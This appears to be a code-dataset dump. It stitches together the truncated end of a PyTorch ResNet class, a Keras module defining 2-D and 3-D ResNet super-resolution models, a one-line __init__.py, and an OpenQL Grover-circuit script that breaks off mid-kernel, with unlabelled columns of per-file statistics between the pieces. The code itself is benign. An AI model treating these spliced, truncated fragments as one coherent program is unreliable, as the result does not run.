                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)
    def _make_layer(self, block, planes, blocks, stride=1):
        """Stack `blocks` residual blocks; only the first may stride/project the skip."""
        downsample = None
        # Project the identity path when stride or channel count changes.
        if stride != 1 or self.inplanes != planes * block.expansion:
            downsample = nn.Sequential(
                conv1x1(self.inplanes, planes * block.expansion, stride),
                nn.BatchNorm2d(planes * block.expansion),
            )
        layers = []
        layers.append(block(self.inplanes, planes, stride, downsample))
        self.inplanes = planes * block.expansion
        for _ in range(1, blocks):
            layers.append(block(self.inplanes, planes))
        return nn.Sequential(*layers)
    def forward(self, x):
        """Return (fc logits, fc2 logits, feature)."""
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.maxpool(x)
        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)
        x = self.avgpool(x)
        x = x.view(x.size(0), -1)
        if self.isL2:
            x = F.normalize(x)
        c = self.fc(x)
        c2 = self.fc2(x)
        return c , c2, x
| 34.544931
| 121
| 0.576755
| 3,957
| 29,985
| 4.269649
| 0.065959
| 0.013377
| 0.031607
| 0.038355
| 0.850962
| 0.812548
| 0.787985
| 0.760817
| 0.739568
| 0.724297
| 0
| 0.063453
| 0.293613
| 29,985
| 867
| 122
| 34.584775
| 0.734196
| 0.02081
| 0
| 0.727407
| 0
| 0
| 0.004133
| 0
| 0
| 0
| 0
| 0
| 0.020741
| 1
| 0.071111
| false
| 0
| 0.014815
| 0.001481
| 0.162963
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13de891fdb9156030c49143b5c2dec8cbe5439bb
| 8,615
|
py
|
Python
|
ext/ANTsPyNet/antspynet/architectures/create_resnet_super_resolution_model.py
|
tsmonteiro/fmri_proc
|
ee740cfa3c3a7ef8e1ee1ebd3b286a66712e0ec1
|
[
"MIT"
] | 2
|
2021-11-16T10:00:33.000Z
|
2021-12-13T02:57:40.000Z
|
ext/ANTsPyNet/antspynet/architectures/create_resnet_super_resolution_model.py
|
tsmonteiro/fmri_proc
|
ee740cfa3c3a7ef8e1ee1ebd3b286a66712e0ec1
|
[
"MIT"
] | null | null | null |
ext/ANTsPyNet/antspynet/architectures/create_resnet_super_resolution_model.py
|
tsmonteiro/fmri_proc
|
ee740cfa3c3a7ef8e1ee1ebd3b286a66712e0ec1
|
[
"MIT"
] | 1
|
2021-12-13T02:57:27.000Z
|
2021-12-13T02:57:27.000Z
|
from keras.models import Model
from keras.layers import (Input, Activation, Add, BatchNormalization,
Conv2D, Conv2DTranspose,
MaxPooling2D, UpSampling2D,
Conv3D, Conv3DTranspose,
MaxPooling3D, UpSampling3D)
def create_resnet_super_resolution_model_2d(input_image_size,
                                            convolution_kernel_size=(3, 3),
                                            number_of_filters=64,
                                            number_of_residual_blocks=5,
                                            number_of_resnet_blocks=1
                                           ):
    """
    2-D implementation of the ResNet image super resolution architecture.

    Creates a keras model of the expanded image super resolution deep learning
    framework based on the following python implementation:

            https://github.com/titu1994/Image-Super-Resolution

    Arguments
    ---------
    input_image_size : tuple of length 3
        Used for specifying the input tensor shape.  The shape (or dimension) of
        that tensor is the image dimensions followed by the number of channels
        (e.g., red, green, and blue).

    convolution_kernel_size : 2-d tuple
        Specifies the kernel size

    number_of_filters : integer
        The number of filters for each encoding layer.

    number_of_residual_blocks : integer
        Number of residual blocks.

    number_of_resnet_blocks : integer
        Number of resnet blocks.  Each block will double the upsampling amount.

    Returns
    -------
    Keras model
        A 2-D Keras model defining the network.

    Example
    -------
    >>> model = create_resnet_super_resolution_model_2d((128, 128, 1))
    >>> model.summary()
    """
    def residual_block_2d(model, number_of_filters, convolution_kernel_size):
        # conv -> BN -> ReLU -> conv -> BN, then add the block input (skip).
        block = Conv2D(filters=number_of_filters,
                       kernel_size=convolution_kernel_size,
                       activation='linear',
                       padding='same')(model)
        block = BatchNormalization()(block)
        block = Activation(activation='relu')(block)
        block = Conv2D(filters=number_of_filters,
                       kernel_size=convolution_kernel_size,
                       activation='linear',
                       padding='same')(block)
        block = BatchNormalization()(block)
        block = Add()([model, block])
        return(block)
    def upscale_block_2d(model, number_of_filters, convolution_kernel_size):
        # 2x upsampling followed by a ReLU conv.
        block = UpSampling2D()(model)
        block = Conv2D(filters=number_of_filters,
                       kernel_size=convolution_kernel_size,
                       activation='relu',
                       padding='same')(block)
        return(block)
    def resnet_block_2d(inputs, number_of_filters, convolution_kernel_size,
                        number_of_residual_blocks):
        outputs = Conv2D(filters=number_of_filters,
                         kernel_size=convolution_kernel_size,
                         activation='relu',
                         padding='same')(inputs)
        residual_blocks = residual_block_2d(outputs, number_of_filters,
                                            convolution_kernel_size)
        # NOTE(review): one residual block is created above and the loop adds
        # number_of_residual_blocks more (N+1 total) — confirm this is intended.
        for i in range(number_of_residual_blocks):
            residual_blocks = residual_block_2d(residual_blocks, number_of_filters,
                                                convolution_kernel_size)
        # Long skip around the whole residual stack, then upscale 2x.
        outputs = Add()([residual_blocks, outputs])
        outputs = upscale_block_2d(outputs, number_of_filters, convolution_kernel_size)
        return(outputs)
    inputs = Input(shape = input_image_size)
    outputs = resnet_block_2d(inputs, number_of_filters, convolution_kernel_size,
                              number_of_residual_blocks)
    # Each additional resnet block doubles the total upsampling factor.
    if number_of_resnet_blocks > 1:
        for i in range(1, number_of_resnet_blocks):
            outputs = resnet_block_2d(outputs, number_of_filters,
                                      convolution_kernel_size, number_of_residual_blocks)
    # Final linear conv maps back to the input channel count.
    number_of_channels = input_image_size[-1]
    outputs = Conv2D(filters=number_of_channels,
                     kernel_size=convolution_kernel_size,
                     activation='linear',
                     padding='same')(outputs)
    sr_model = Model(inputs=inputs, outputs=outputs)
    return(sr_model)
def create_resnet_super_resolution_model_3d(input_image_size,
                                            convolution_kernel_size=(3, 3, 3),
                                            number_of_filters=64,
                                            number_of_residual_blocks=5,
                                            number_of_resnet_blocks=1
                                           ):
    """
    3-D implementation of the ResNet image super resolution architecture.

    Creates a keras model of the expanded image super resolution deep learning
    framework based on the following python implementation:

            https://github.com/titu1994/Image-Super-Resolution

    Arguments
    ---------
    input_image_size : tuple of length 4
        Used for specifying the input tensor shape.  The shape (or dimension) of
        that tensor is the image dimensions followed by the number of channels
        (e.g., red, green, and blue).

    convolution_kernel_size : 3-d tuple
        Specifies the kernel size

    number_of_filters : integer
        The number of filters for each encoding layer.

    number_of_residual_blocks : integer
        Number of residual blocks.

    number_of_resnet_blocks : integer
        Number of resnet blocks.  Each block will double the upsampling amount.

    Returns
    -------
    Keras model
        A 3-D Keras model defining the network.

    Example
    -------
    >>> model = create_resnet_super_resolution_model_3d((128, 128, 128, 1))
    >>> model.summary()
    """
    def residual_block_3d(model, number_of_filters, convolution_kernel_size):
        # conv -> BN -> ReLU -> conv -> BN, then add the block input (skip).
        block = Conv3D(filters=number_of_filters,
                       kernel_size=convolution_kernel_size,
                       activation='linear',
                       padding='same')(model)
        block = BatchNormalization()(block)
        block = Activation(activation='relu')(block)
        block = Conv3D(filters=number_of_filters,
                       kernel_size=convolution_kernel_size,
                       activation='linear',
                       padding='same')(block)
        block = BatchNormalization()(block)
        block = Add()([model, block])
        return(block)
    def upscale_block_3d(model, number_of_filters, convolution_kernel_size):
        # 2x upsampling followed by a ReLU conv.
        block = UpSampling3D()(model)
        block = Conv3D(filters=number_of_filters,
                       kernel_size=convolution_kernel_size,
                       activation='relu',
                       padding='same')(block)
        return(block)
    def resnet_block_3d(inputs, number_of_filters, convolution_kernel_size,
                        number_of_residual_blocks):
        outputs = Conv3D(filters=number_of_filters,
                         kernel_size=convolution_kernel_size,
                         activation='relu',
                         padding='same')(inputs)
        residual_blocks = residual_block_3d(outputs, number_of_filters,
                                            convolution_kernel_size)
        # NOTE(review): one residual block is created above and the loop adds
        # number_of_residual_blocks more (N+1 total) — confirm this is intended.
        for i in range(number_of_residual_blocks):
            residual_blocks = residual_block_3d(residual_blocks, number_of_filters,
                                                convolution_kernel_size)
        # Long skip around the whole residual stack, then upscale 2x.
        outputs = Add()([residual_blocks, outputs])
        outputs = upscale_block_3d(outputs, number_of_filters, convolution_kernel_size)
        return(outputs)
    inputs = Input(shape = input_image_size)
    outputs = resnet_block_3d(inputs, number_of_filters, convolution_kernel_size,
                              number_of_residual_blocks)
    # Each additional resnet block doubles the total upsampling factor.
    if number_of_resnet_blocks > 1:
        for i in range(1, number_of_resnet_blocks):
            outputs = resnet_block_3d(outputs, number_of_filters,
                                      convolution_kernel_size, number_of_residual_blocks)
    # Final linear conv maps back to the input channel count.
    number_of_channels = input_image_size[-1]
    outputs = Conv3D(filters=number_of_channels,
                     kernel_size=convolution_kernel_size,
                     activation='linear',
                     padding='same')(outputs)
    sr_model = Model(inputs=inputs, outputs=outputs)
    return(sr_model)
| 37.620087
| 90
| 0.594893
| 887
| 8,615
| 5.468997
| 0.122886
| 0.098949
| 0.12987
| 0.085756
| 0.955061
| 0.951763
| 0.935683
| 0.935683
| 0.908679
| 0.906205
| 0
| 0.016101
| 0.336738
| 8,615
| 228
| 91
| 37.785088
| 0.832867
| 0.234707
| 0
| 0.724138
| 0
| 0
| 0.015726
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.017241
| 0
| 0.086207
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13f8ab2e56225ab2c39c34021f0f607148bf8795
| 48
|
py
|
Python
|
src/nlp_modeltrainers/__init__.py
|
TeaKatz/NLP_ModelTrainers
|
cc212f02b2c9204585ab172cef0101b5882edf92
|
[
"MIT"
] | null | null | null |
src/nlp_modeltrainers/__init__.py
|
TeaKatz/NLP_ModelTrainers
|
cc212f02b2c9204585ab172cef0101b5882edf92
|
[
"MIT"
] | null | null | null |
src/nlp_modeltrainers/__init__.py
|
TeaKatz/NLP_ModelTrainers
|
cc212f02b2c9204585ab172cef0101b5882edf92
|
[
"MIT"
] | null | null | null |
from .BaseTrainerModule import BaseTrainerModule
| 48
| 48
| 0.916667
| 4
| 48
| 11
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 48
| 1
| 48
| 48
| 0.977778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b98b99a9381aa754eec3ed3ee063d785aaf1ab54
| 31,064
|
py
|
Python
|
examples/cpp-standalone-example/example.py
|
Hopery/OpenQL
|
f6cf78b7add50827166fd79c29dc7a8ea6fd624f
|
[
"Apache-2.0"
] | null | null | null |
examples/cpp-standalone-example/example.py
|
Hopery/OpenQL
|
f6cf78b7add50827166fd79c29dc7a8ea6fd624f
|
[
"Apache-2.0"
] | null | null | null |
examples/cpp-standalone-example/example.py
|
Hopery/OpenQL
|
f6cf78b7add50827166fd79c29dc7a8ea6fd624f
|
[
"Apache-2.0"
] | null | null | null |
from openql import openql as ql
import os
import argparse
def circuit(new_scheduler='yes', scheduler='ASAP', uniform_sched= 'no', sched_commute = 'yes', mapper='no', moves='no', maptiebreak='random', initial_placement='no', output_dir_name='compiler_output', measurement=True, log_level='LOG_NOTHING'):
output_dir = output_dir_name
ql.initialize()
ql.set_option('output_dir', output_dir)
ql.set_option('log_level', log_level)
ql.set_option('use_default_gates', 'no')
ql.set_option('mapper', mapper)
ql.set_option('write_qasm_files', 'yes')
ql.set_option('write_report_files', 'yes')
platform = ql.Platform('mctests', 'test_multi_core_4x4_full.json')
num_circuits = 1
num_qubits = 32
p = ql.Program('grover_q32_1', platform, num_qubits)
k = ql.Kernel('grover_q32_1', platform, num_qubits)
k.gate('x', (16,))
k.gate('x', (0,))
k.gate('ym90', (0,))
k.gate('x', (1,))
k.gate('ym90', (1,))
k.gate('x', (2,))
k.gate('ym90', (2,))
k.gate('x', (3,))
k.gate('ym90', (3,))
k.gate('x', (4,))
k.gate('ym90', (4,))
k.gate('x', (5,))
k.gate('ym90', (5,))
k.gate('x', (6,))
k.gate('ym90', (6,))
k.gate('x', (7,))
k.gate('ym90', (7,))
k.gate('x', (8,))
k.gate('ym90', (8,))
k.gate('x', (9,))
k.gate('ym90', (9,))
k.gate('x', (10,))
k.gate('ym90', (10,))
k.gate('x', (11,))
k.gate('ym90', (11,))
k.gate('x', (12,))
k.gate('ym90', (12,))
k.gate('x', (13,))
k.gate('ym90', (13,))
k.gate('x', (14,))
k.gate('ym90', (14,))
k.gate('x', (15,))
k.gate('ym90', (15,))
k.gate('x', (16,))
k.gate('ym90', (16,))
k.gate('x', (0,))
k.gate('x', (1,))
k.gate('x', (2,))
k.gate('x', (3,))
k.gate('x', (4,))
k.gate('x', (5,))
k.gate('x', (6,))
k.gate('x', (7,))
k.gate('x', (8,))
k.gate('x', (9,))
k.gate('x', (10,))
k.gate('x', (11,))
k.gate('x', (12,))
k.gate('x', (13,))
k.gate('x', (14,))
k.gate('x', (15,))
k.gate('x', (17,))
k.gate('ym90', (17,))
k.gate('cnot', (1, 17))
k.gate('tdag', (17,))
k.gate('cnot', (0, 17))
k.gate('t', (17,))
k.gate('cnot', (1, 17))
k.gate('tdag', (17,))
k.gate('cnot', (0, 17))
k.gate('t', (1,))
k.gate('t', (17,))
k.gate('x', (17,))
k.gate('ym90', (17,))
k.gate('cnot', (0, 1))
k.gate('tdag', (1,))
k.gate('t', (0,))
k.gate('cnot', (0, 1))
k.gate('x', (18,))
k.gate('ym90', (18,))
k.gate('cnot', (17, 18))
k.gate('tdag', (18,))
k.gate('cnot', (2, 18))
k.gate('t', (18,))
k.gate('cnot', (17, 18))
k.gate('tdag', (18,))
k.gate('cnot', (2, 18))
k.gate('t', (17,))
k.gate('t', (18,))
k.gate('x', (18,))
k.gate('ym90', (18,))
k.gate('cnot', (2, 17))
k.gate('tdag', (17,))
k.gate('t', (2,))
k.gate('cnot', (2, 17))
k.gate('x', (19,))
k.gate('ym90', (19,))
k.gate('cnot', (18, 19))
k.gate('tdag', (19,))
k.gate('cnot', (3, 19))
k.gate('t', (19,))
k.gate('cnot', (18, 19))
k.gate('tdag', (19,))
k.gate('cnot', (3, 19))
k.gate('t', (18,))
k.gate('t', (19,))
k.gate('x', (19,))
k.gate('ym90', (19,))
k.gate('cnot', (3, 18))
k.gate('tdag', (18,))
k.gate('t', (3,))
k.gate('cnot', (3, 18))
k.gate('x', (20,))
k.gate('ym90', (20,))
k.gate('cnot', (19, 20))
k.gate('tdag', (20,))
k.gate('cnot', (4, 20))
k.gate('t', (20,))
k.gate('cnot', (19, 20))
k.gate('tdag', (20,))
k.gate('cnot', (4, 20))
k.gate('t', (19,))
k.gate('t', (20,))
k.gate('x', (20,))
k.gate('ym90', (20,))
k.gate('cnot', (4, 19))
k.gate('tdag', (19,))
k.gate('t', (4,))
k.gate('cnot', (4, 19))
k.gate('x', (21,))
k.gate('ym90', (21,))
k.gate('cnot', (20, 21))
k.gate('tdag', (21,))
k.gate('cnot', (5, 21))
k.gate('t', (21,))
k.gate('cnot', (20, 21))
k.gate('tdag', (21,))
k.gate('cnot', (5, 21))
k.gate('t', (20,))
k.gate('t', (21,))
k.gate('x', (21,))
k.gate('ym90', (21,))
k.gate('cnot', (5, 20))
k.gate('tdag', (20,))
k.gate('t', (5,))
k.gate('cnot', (5, 20))
k.gate('x', (22,))
k.gate('ym90', (22,))
k.gate('cnot', (21, 22))
k.gate('tdag', (22,))
k.gate('cnot', (6, 22))
k.gate('t', (22,))
k.gate('cnot', (21, 22))
k.gate('tdag', (22,))
k.gate('cnot', (6, 22))
k.gate('t', (21,))
k.gate('t', (22,))
k.gate('x', (22,))
k.gate('ym90', (22,))
k.gate('cnot', (6, 21))
k.gate('tdag', (21,))
k.gate('t', (6,))
k.gate('cnot', (6, 21))
k.gate('x', (23,))
k.gate('ym90', (23,))
k.gate('cnot', (22, 23))
k.gate('tdag', (23,))
k.gate('cnot', (7, 23))
k.gate('t', (23,))
k.gate('cnot', (22, 23))
k.gate('tdag', (23,))
k.gate('cnot', (7, 23))
k.gate('t', (22,))
k.gate('t', (23,))
k.gate('x', (23,))
k.gate('ym90', (23,))
k.gate('cnot', (7, 22))
k.gate('tdag', (22,))
k.gate('t', (7,))
k.gate('cnot', (7, 22))
k.gate('x', (24,))
k.gate('ym90', (24,))
k.gate('cnot', (23, 24))
k.gate('tdag', (24,))
k.gate('cnot', (8, 24))
k.gate('t', (24,))
k.gate('cnot', (23, 24))
k.gate('tdag', (24,))
k.gate('cnot', (8, 24))
k.gate('t', (23,))
k.gate('t', (24,))
k.gate('x', (24,))
k.gate('ym90', (24,))
k.gate('cnot', (8, 23))
k.gate('tdag', (23,))
k.gate('t', (8,))
k.gate('cnot', (8, 23))
k.gate('x', (25,))
k.gate('ym90', (25,))
k.gate('cnot', (24, 25))
k.gate('tdag', (25,))
k.gate('cnot', (9, 25))
k.gate('t', (25,))
k.gate('cnot', (24, 25))
k.gate('tdag', (25,))
k.gate('cnot', (9, 25))
k.gate('t', (24,))
k.gate('t', (25,))
k.gate('x', (25,))
k.gate('ym90', (25,))
k.gate('cnot', (9, 24))
k.gate('tdag', (24,))
k.gate('t', (9,))
k.gate('cnot', (9, 24))
k.gate('x', (26,))
k.gate('ym90', (26,))
k.gate('cnot', (25, 26))
k.gate('tdag', (26,))
k.gate('cnot', (10, 26))
k.gate('t', (26,))
k.gate('cnot', (25, 26))
k.gate('tdag', (26,))
k.gate('cnot', (10, 26))
k.gate('t', (25,))
k.gate('t', (26,))
k.gate('x', (26,))
k.gate('ym90', (26,))
k.gate('cnot', (10, 25))
k.gate('tdag', (25,))
k.gate('t', (10,))
k.gate('cnot', (10, 25))
k.gate('x', (27,))
k.gate('ym90', (27,))
k.gate('cnot', (26, 27))
k.gate('tdag', (27,))
k.gate('cnot', (11, 27))
k.gate('t', (27,))
k.gate('cnot', (26, 27))
k.gate('tdag', (27,))
k.gate('cnot', (11, 27))
k.gate('t', (26,))
k.gate('t', (27,))
k.gate('x', (27,))
k.gate('ym90', (27,))
k.gate('cnot', (11, 26))
k.gate('tdag', (26,))
k.gate('t', (11,))
k.gate('cnot', (11, 26))
k.gate('x', (28,))
k.gate('ym90', (28,))
k.gate('cnot', (27, 28))
k.gate('tdag', (28,))
k.gate('cnot', (12, 28))
k.gate('t', (28,))
k.gate('cnot', (27, 28))
k.gate('tdag', (28,))
k.gate('cnot', (12, 28))
k.gate('t', (27,))
k.gate('t', (28,))
k.gate('x', (28,))
k.gate('ym90', (28,))
k.gate('cnot', (12, 27))
k.gate('tdag', (27,))
k.gate('t', (12,))
k.gate('cnot', (12, 27))
k.gate('x', (29,))
k.gate('ym90', (29,))
k.gate('cnot', (28, 29))
k.gate('tdag', (29,))
k.gate('cnot', (13, 29))
k.gate('t', (29,))
k.gate('cnot', (28, 29))
k.gate('tdag', (29,))
k.gate('cnot', (13, 29))
k.gate('t', (28,))
k.gate('t', (29,))
k.gate('x', (29,))
k.gate('ym90', (29,))
k.gate('cnot', (13, 28))
k.gate('tdag', (28,))
k.gate('t', (13,))
k.gate('cnot', (13, 28))
k.gate('x', (30,))
k.gate('ym90', (30,))
k.gate('cnot', (29, 30))
k.gate('tdag', (30,))
k.gate('cnot', (14, 30))
k.gate('t', (30,))
k.gate('cnot', (29, 30))
k.gate('tdag', (30,))
k.gate('cnot', (14, 30))
k.gate('t', (29,))
k.gate('t', (30,))
k.gate('x', (30,))
k.gate('ym90', (30,))
k.gate('cnot', (14, 29))
k.gate('tdag', (29,))
k.gate('t', (14,))
k.gate('cnot', (14, 29))
k.gate('x', (16,))
k.gate('ym90', (16,))
k.gate('cnot', (15, 16))
k.gate('tdag', (16,))
k.gate('cnot', (30, 16))
k.gate('t', (16,))
k.gate('cnot', (15, 16))
k.gate('tdag', (16,))
k.gate('cnot', (30, 16))
k.gate('t', (15,))
k.gate('t', (16,))
k.gate('x', (16,))
k.gate('ym90', (16,))
k.gate('cnot', (30, 15))
k.gate('tdag', (15,))
k.gate('t', (30,))
k.gate('cnot', (30, 15))
k.gate('x', (30,))
k.gate('ym90', (30,))
k.gate('cnot', (29, 30))
k.gate('tdag', (30,))
k.gate('cnot', (14, 30))
k.gate('t', (30,))
k.gate('cnot', (29, 30))
k.gate('tdag', (30,))
k.gate('cnot', (14, 30))
k.gate('t', (29,))
k.gate('t', (30,))
k.gate('x', (30,))
k.gate('ym90', (30,))
k.gate('cnot', (14, 29))
k.gate('tdag', (29,))
k.gate('t', (14,))
k.gate('cnot', (14, 29))
k.gate('x', (29,))
k.gate('ym90', (29,))
k.gate('cnot', (28, 29))
k.gate('tdag', (29,))
k.gate('cnot', (13, 29))
k.gate('t', (29,))
k.gate('cnot', (28, 29))
k.gate('tdag', (29,))
k.gate('cnot', (13, 29))
k.gate('t', (28,))
k.gate('t', (29,))
k.gate('x', (29,))
k.gate('ym90', (29,))
k.gate('cnot', (13, 28))
k.gate('tdag', (28,))
k.gate('t', (13,))
k.gate('cnot', (13, 28))
k.gate('x', (28,))
k.gate('ym90', (28,))
k.gate('cnot', (27, 28))
k.gate('tdag', (28,))
k.gate('cnot', (12, 28))
k.gate('t', (28,))
k.gate('cnot', (27, 28))
k.gate('tdag', (28,))
k.gate('cnot', (12, 28))
k.gate('t', (27,))
k.gate('t', (28,))
k.gate('x', (28,))
k.gate('ym90', (28,))
k.gate('cnot', (12, 27))
k.gate('tdag', (27,))
k.gate('t', (12,))
k.gate('cnot', (12, 27))
k.gate('x', (27,))
k.gate('ym90', (27,))
k.gate('cnot', (26, 27))
k.gate('tdag', (27,))
k.gate('cnot', (11, 27))
k.gate('t', (27,))
k.gate('cnot', (26, 27))
k.gate('tdag', (27,))
k.gate('cnot', (11, 27))
k.gate('t', (26,))
k.gate('t', (27,))
k.gate('x', (27,))
k.gate('ym90', (27,))
k.gate('cnot', (11, 26))
k.gate('tdag', (26,))
k.gate('t', (11,))
k.gate('cnot', (11, 26))
k.gate('x', (26,))
k.gate('ym90', (26,))
k.gate('cnot', (25, 26))
k.gate('tdag', (26,))
k.gate('cnot', (10, 26))
k.gate('t', (26,))
k.gate('cnot', (25, 26))
k.gate('tdag', (26,))
k.gate('cnot', (10, 26))
k.gate('t', (25,))
k.gate('t', (26,))
k.gate('x', (26,))
k.gate('ym90', (26,))
k.gate('cnot', (10, 25))
k.gate('tdag', (25,))
k.gate('t', (10,))
k.gate('cnot', (10, 25))
k.gate('x', (25,))
k.gate('ym90', (25,))
k.gate('cnot', (24, 25))
k.gate('tdag', (25,))
k.gate('cnot', (9, 25))
k.gate('t', (25,))
k.gate('cnot', (24, 25))
k.gate('tdag', (25,))
k.gate('cnot', (9, 25))
k.gate('t', (24,))
k.gate('t', (25,))
k.gate('x', (25,))
k.gate('ym90', (25,))
k.gate('cnot', (9, 24))
k.gate('tdag', (24,))
k.gate('t', (9,))
k.gate('cnot', (9, 24))
k.gate('x', (24,))
k.gate('ym90', (24,))
k.gate('cnot', (23, 24))
k.gate('tdag', (24,))
k.gate('cnot', (8, 24))
k.gate('t', (24,))
k.gate('cnot', (23, 24))
k.gate('tdag', (24,))
k.gate('cnot', (8, 24))
k.gate('t', (23,))
k.gate('t', (24,))
k.gate('x', (24,))
k.gate('ym90', (24,))
k.gate('cnot', (8, 23))
k.gate('tdag', (23,))
k.gate('t', (8,))
k.gate('cnot', (8, 23))
k.gate('x', (23,))
k.gate('ym90', (23,))
k.gate('cnot', (22, 23))
k.gate('tdag', (23,))
k.gate('cnot', (7, 23))
k.gate('t', (23,))
k.gate('cnot', (22, 23))
k.gate('tdag', (23,))
k.gate('cnot', (7, 23))
k.gate('t', (22,))
k.gate('t', (23,))
k.gate('x', (23,))
k.gate('ym90', (23,))
k.gate('cnot', (7, 22))
k.gate('tdag', (22,))
k.gate('t', (7,))
k.gate('cnot', (7, 22))
k.gate('x', (22,))
k.gate('ym90', (22,))
k.gate('cnot', (21, 22))
k.gate('tdag', (22,))
k.gate('cnot', (6, 22))
k.gate('t', (22,))
k.gate('cnot', (21, 22))
k.gate('tdag', (22,))
k.gate('cnot', (6, 22))
k.gate('t', (21,))
k.gate('t', (22,))
k.gate('x', (22,))
k.gate('ym90', (22,))
k.gate('cnot', (6, 21))
k.gate('tdag', (21,))
k.gate('t', (6,))
k.gate('cnot', (6, 21))
k.gate('x', (21,))
k.gate('ym90', (21,))
k.gate('cnot', (20, 21))
k.gate('tdag', (21,))
k.gate('cnot', (5, 21))
k.gate('t', (21,))
k.gate('cnot', (20, 21))
k.gate('tdag', (21,))
k.gate('cnot', (5, 21))
k.gate('t', (20,))
k.gate('t', (21,))
k.gate('x', (21,))
k.gate('ym90', (21,))
k.gate('cnot', (5, 20))
k.gate('tdag', (20,))
k.gate('t', (5,))
k.gate('cnot', (5, 20))
k.gate('x', (20,))
k.gate('ym90', (20,))
k.gate('cnot', (19, 20))
k.gate('tdag', (20,))
k.gate('cnot', (4, 20))
k.gate('t', (20,))
k.gate('cnot', (19, 20))
k.gate('tdag', (20,))
k.gate('cnot', (4, 20))
k.gate('t', (19,))
k.gate('t', (20,))
k.gate('x', (20,))
k.gate('ym90', (20,))
k.gate('cnot', (4, 19))
k.gate('tdag', (19,))
k.gate('t', (4,))
k.gate('cnot', (4, 19))
k.gate('x', (19,))
k.gate('ym90', (19,))
k.gate('cnot', (18, 19))
k.gate('tdag', (19,))
k.gate('cnot', (3, 19))
k.gate('t', (19,))
k.gate('cnot', (18, 19))
k.gate('tdag', (19,))
k.gate('cnot', (3, 19))
k.gate('t', (18,))
k.gate('t', (19,))
k.gate('x', (19,))
k.gate('ym90', (19,))
k.gate('cnot', (3, 18))
k.gate('tdag', (18,))
k.gate('t', (3,))
k.gate('cnot', (3, 18))
k.gate('x', (18,))
k.gate('ym90', (18,))
k.gate('cnot', (17, 18))
k.gate('tdag', (18,))
k.gate('cnot', (2, 18))
k.gate('t', (18,))
k.gate('cnot', (17, 18))
k.gate('tdag', (18,))
k.gate('cnot', (2, 18))
k.gate('t', (17,))
k.gate('t', (18,))
k.gate('x', (18,))
k.gate('ym90', (18,))
k.gate('cnot', (2, 17))
k.gate('tdag', (17,))
k.gate('t', (2,))
k.gate('cnot', (2, 17))
k.gate('x', (17,))
k.gate('ym90', (17,))
k.gate('cnot', (1, 17))
k.gate('tdag', (17,))
k.gate('cnot', (0, 17))
k.gate('t', (17,))
k.gate('cnot', (1, 17))
k.gate('tdag', (17,))
k.gate('cnot', (0, 17))
k.gate('t', (1,))
k.gate('t', (17,))
k.gate('x', (17,))
k.gate('ym90', (17,))
k.gate('cnot', (0, 1))
k.gate('tdag', (1,))
k.gate('t', (0,))
k.gate('cnot', (0, 1))
k.gate('x', (0,))
k.gate('x', (1,))
k.gate('x', (2,))
k.gate('x', (3,))
k.gate('x', (4,))
k.gate('x', (5,))
k.gate('x', (6,))
k.gate('x', (7,))
k.gate('x', (8,))
k.gate('x', (9,))
k.gate('x', (10,))
k.gate('x', (11,))
k.gate('x', (12,))
k.gate('x', (13,))
k.gate('x', (14,))
k.gate('x', (15,))
k.gate('x', (0,))
k.gate('ym90', (0,))
k.gate('x', (1,))
k.gate('ym90', (1,))
k.gate('x', (2,))
k.gate('ym90', (2,))
k.gate('x', (3,))
k.gate('ym90', (3,))
k.gate('x', (4,))
k.gate('ym90', (4,))
k.gate('x', (5,))
k.gate('ym90', (5,))
k.gate('x', (6,))
k.gate('ym90', (6,))
k.gate('x', (7,))
k.gate('ym90', (7,))
k.gate('x', (8,))
k.gate('ym90', (8,))
k.gate('x', (9,))
k.gate('ym90', (9,))
k.gate('x', (10,))
k.gate('ym90', (10,))
k.gate('x', (11,))
k.gate('ym90', (11,))
k.gate('x', (12,))
k.gate('ym90', (12,))
k.gate('x', (13,))
k.gate('ym90', (13,))
k.gate('x', (14,))
k.gate('ym90', (14,))
k.gate('x', (15,))
k.gate('ym90', (15,))
k.gate('x', (0,))
k.gate('x', (1,))
k.gate('x', (2,))
k.gate('x', (3,))
k.gate('x', (4,))
k.gate('x', (5,))
k.gate('x', (6,))
k.gate('x', (7,))
k.gate('x', (8,))
k.gate('x', (9,))
k.gate('x', (10,))
k.gate('x', (11,))
k.gate('x', (12,))
k.gate('x', (13,))
k.gate('x', (14,))
k.gate('x', (15,))
k.gate('x', (15,))
k.gate('ym90', (15,))
k.gate('x', (17,))
k.gate('ym90', (17,))
k.gate('cnot', (1, 17))
k.gate('tdag', (17,))
k.gate('cnot', (0, 17))
k.gate('t', (17,))
k.gate('cnot', (1, 17))
k.gate('tdag', (17,))
k.gate('cnot', (0, 17))
k.gate('t', (1,))
k.gate('t', (17,))
k.gate('x', (17,))
k.gate('ym90', (17,))
k.gate('cnot', (0, 1))
k.gate('tdag', (1,))
k.gate('t', (0,))
k.gate('cnot', (0, 1))
k.gate('x', (18,))
k.gate('ym90', (18,))
k.gate('cnot', (17, 18))
k.gate('tdag', (18,))
